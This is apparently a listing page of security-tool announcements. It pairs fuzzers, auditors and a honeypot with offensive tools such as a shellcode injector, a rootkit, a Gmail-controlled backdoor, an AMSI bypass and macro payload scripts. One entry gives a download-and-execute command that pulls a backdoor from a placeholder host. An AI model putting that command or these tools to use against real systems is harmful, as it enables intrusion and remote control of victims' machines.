Droidfuzzer – A Modular Android Fuzzing Toolkit.
DroidFuzzer is an Android fuzzing toolkit that is meant to target devices and their mechanisms for parsing things like images and documents. DroidFuzzer is meant to be modular allowing the support for...
cypher is a simple tool to automate adding shellcode to PE files.
cypher is a simple tool to automate adding shellcode to PE files. With payload options: 0 – windows/shell_reverse_tcp 1 – windows/meterpreter/reverse_http 2 – windows/meterpreter/reverse_http...
ReVdK3 Access Point pentest Script.
This script was created for access points that lock up for long periods of time. It works by starting reaver and continuously detecting when reaver is rate limiting pins, once reaver detects the AP is...
SQLViking: sniff/log database traffic or actively execute arbitrary...
SQLViking sniffs/logs database traffic or actively executes arbitrary queries via TCP injection. The tool is broken up into two pieces: 1. Scout: passively reads and logs SQL queries and their responses...
Eros Rootkit is a special kind of malware with its own custom bootloader.
NOTICE: THIS POST IS FOR EDUCATIONAL PURPOSES ONLY! You can learn how a rootkit takes control of the system. The Eros Rootkit is a special kind of malware with its own custom bootloader. The rootkit...
O-Saft v16.05.15: OWASP SSL audit for testers & OWASP SSL advanced forensic...
changelog version 16.05.15: + updated version, deleted unused value for cfg{'openssl_version_map'} + First use of error_handler, editorial changes + Net::SSLeay as exception for global vars added +...
King Phisher v1.3.0 – a phishing-focused social engineering campaign.
Changelog v1.3.0 Released on May 17th, 2016: + Added automatic setup of PostgreSQL database for the server + Server bug fixes when running on non-standard HTTP ports + Added completion to the messaged...
PowerOPS – Powershell for Offensive Operations.
PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a powershell runspace environment (.NET). It intends to include multiple...
Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer.
Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading...
Pocsuite v2 ~ A remote vulnerability test framework.
Roadmap changelog version 2.1: * add method:resolve_js_redirects * differentiate between error and failure version 2.0: * Integrate Seebug and ZoomEye APIs(doing) * Add English...
QuantumInject – Packet injection and detection using python.
quantumInject captures the traffic from a network interface in promiscuous mode and attempts to inject spoofed responses to selected client requests towards TCP services. quantuminject Your...
NoSQLMap v0.5.1.1 – Automated Mongo database and NoSQL web application...
Latest change v0.5.1.1: + Update nsmcouch.py + idea/NoSQLMap-v0.5.iml & nosqlmap.py; fix two bug of set local mongoDB/shell IP: – bug1: Every time when user input Invalid IP, goodLen and goodDigits...
sshhipot: High-interaction MitM SSH honeypot.
sshhipot : High-interaction MitM SSH honeypot. The general idea is that sshlowpot runs somewhere between the attacker and the real SSH server such that the attacker logs into the honeypot, and the...
gdog v1.1 – A fully featured backdoor that uses Gmail as a C&C server.
changelog gdog v1.1: + Bug fixing (shellcode) + fixed by carnal0wnage. + Shellcode generator helper + Minor improvements gdog v1.1 Gdog is a stealthy Python-based backdoor that uses Gmail as a command...
Nishang v0.6.7 – PowerShell for penetration testing and offensive security.
changelog v0.6.7: – Added Out-JS.ps1 in the Client directory. – Added Out-SCT.ps1 in the Client directory. – Added Invoke-JSRatRegsvr.ps1 in the Shells directory. – Added Out-RundllCommand in the...
Appmon – Runtime Security Testing Framework for iOS, Mac OS X and Android Apps.
AppMon is an automated framework for monitoring and tampering system API calls of native apps on iOS, Mac OS X and Android apps (upcoming). You may call it the GreaseMonkey for native mobile apps....
BetterCap v1.5.5 – A complete, modular, portable and easily extensible MITM...
Changelog v1.5.5: New Features + New --use-mac and --random-mac options to hide the interface MAC address during an attack. + HTTP proxy modules can now return a crafted response from their...
p0wnedShell v1.4 – PowerShell Runspace Post Exploitation Toolkit.
Changelog Version 1.4: + Includes a bypass method for Amsi (Antimalware Scan Interface) within Windows 10. pownedshell v1.4 p0wnedShell is an offensive PowerShell host application written in C# that...
Magic Unicorn Attack Vector v2.3.
Changelog version 2.3: * added support for windows/download_exec as a payload option – just run python unicorn.py windows/download_exec exe=exename.exe url=http://badsite.com/backdoor.exe – note it...
MacroShop – Collection of scripts to aid in delivering payloads via Office...
Collection of scripts to aid in delivering payloads via Office Macros. Most are python. 1. macro_safe.py Generates safe for VB inclusion into an excel spreadsheet. Requires a batch file generated by...